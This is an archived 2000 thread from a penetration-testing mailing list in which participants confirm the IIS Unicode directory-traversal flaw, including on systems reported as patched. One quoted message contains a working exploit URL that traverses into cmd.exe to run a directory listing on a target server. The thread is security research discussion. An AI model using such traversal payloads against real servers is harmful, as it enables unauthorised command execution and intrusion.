Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings
From: "Moonen, Ralph" <Moonen.Ralph () KPMG NL>
Date: Wed, 1 Nov 2000 14:24:09 +0100

I can confirm that this works on a system that is supposedly patched.
Seems like there's somethin' strange going bump in the night.

-----Original Message-----
From: Unicraft Systems [mailto:unicraft () OTERO CL]
Sent: Wednesday, November 01, 2000 12:47 AM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings


--- Virus checked / op virussen gecontroleerd ---

It works for me too!!!   =)
This was tested in an NT 4 SP6 server.


Regards,
DonSata

-----Original Message-----
From: Penetration Testers
[mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf Of
Mike Ahern
Sent: Tuesday, October 31, 2000 8:14 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings

Vitaly Osipov [vos () TELENOR CZ] wrote:
Hmm... I see some *very* strange strings in you
examples below... the second excaped symbol (%pc for
example) is not real escaped hex-code -if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------


Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...

The Proof is in the Pudding:
----------------------------

http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
 Directory of c:\



**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.

This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses.

www.mimesweeper.com
**********************************************************************


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault